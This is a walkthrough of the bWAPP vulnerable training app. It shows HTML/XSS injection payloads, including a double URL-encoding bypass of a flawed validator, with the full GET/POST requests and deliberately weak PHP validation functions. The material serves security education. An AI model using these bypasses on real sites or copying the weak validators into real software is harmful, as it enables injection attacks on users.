bWAPP

Injection

Cross Site Scripting (XSS)


  • Stored XSS
  • Reflective XSS
  • DOM-based XSS
  • Server XSS
  • Client XSS

htmli_get.php - Reflective XSS using HTTP GET and HTTP POST Method

Security Level Low

// Input Validation
function no_check($data) {    
    return $data;
}

Attack

Because there is no input validation in place, injection is quite easily done. E.g., if we enter following values:

firstname: <a href="http://www.google.com"><h1>Click Me</h1></a>
lastname : Security Level: Low

the resulting HTTP-Request (GET Method) is:

GET /bWAPP/htmli_get.php?firstname=<a+href%3D"http%3A%2F%2Fwww.google.com"><h1>Click+Me<%2Fh1><%2Fa>&lastname=Security+Level%3A+Low&form=submit HTTP/1.0

the resulting HTTP-Request (POST Method) is:

POST /bWAPP/htmli_post.php HTTP/1.0
Content-Length: 138
Content-Type: application/x-www-form-urlencoded

firstname=%3Ca+href%3D%22http%3A%2F%2Fwww.google.com%22%3E%3Ch1%3EClick+Me%3C%2Fh1%3E%3C%2Fa%3E&lastname=Security+Level%3A+Low&form=submit
  • Security Level Low: no_check($data)
    • vulnerable: no input validation
Injection Result - Low Security

Security Level Medium

// Input Validation
function xss_check_1($data) {
    // Converts only "<" and ">" to HTLM entities    
    $input = str_replace("<", "&lt;", $data);
    $input = str_replace(">", "&gt;", $input);
    
    // Failure is an option
    // Bypasses double encoding attacks   
    // <script>alert(0)</script>
    // %3Cscript%3Ealert%280%29%3C%2Fscript%3E
    // %253Cscript%253Ealert%25280%2529%253C%252Fscript%253E
    $input = urldecode($input);
    
    return $input;
}

Attack

The input validation does not protect against double url-encoded input data. E.g., if we enter following values:

firstname: %3Ca+href="http://www.google.com"%3E%3Ch1%3EClick+Me%3C/h1%3E%3C/a%3E
lastname : Security Level: Medium

the resulting HTTP-Request(GET Method) is:

GET /bWAPP/htmli_get.php?firstname=%253Ca%2Bhref%3D"http%3A%2F%2Fwww.google.com"%253E%253Ch1%253EClick%2BMe%253C%2Fh1%253E%253C%2Fa%253E&lastname=Security+Level%3A+Medium&form=submit HTTP/1.0

the resulting HTTP-Request(POST Method) is:

POST /bWAPP/htmli_post.php HTTP/1.0
Content-Length: 161
Content-Type: application/x-www-form-urlencoded

firstname=%253Ca%2Bhref%3D%22http%3A%2F%2Fwww.google.com%22%253E%253Ch1%253EClick%2BMe%253C%2Fh1%253E%253C%2Fa%253E&lastname=Security+Level%3A+Medium&form=submit
  • Security Level Medium: xss_check_1($data)
    • vulnerable: insufficient input validation
    • uses urldecode() for already url-decoded data ($_GET), thus allowing double url-encoded data
Injection Result - Medium Security

Security Level High

// Input Validation
function xss_check_3($data, $encoding = "UTF-8") {
    // htmlspecialchars - converts special characters to HTML entities    
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;'  
    
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
}

Attack

At the moment, there is no known way to circumvent this input validation, if used in the right context.

  • Security Level High: xss_check_3($data)
    • no known vulnerability if used in the right context

iframei.php - iFrame Injection

Security Level Low

GET /bWAPP/iframei.php?ParamUrl=https://www.bing.com&ParamWidth=250&ParamHeight=250 HTTP/1.0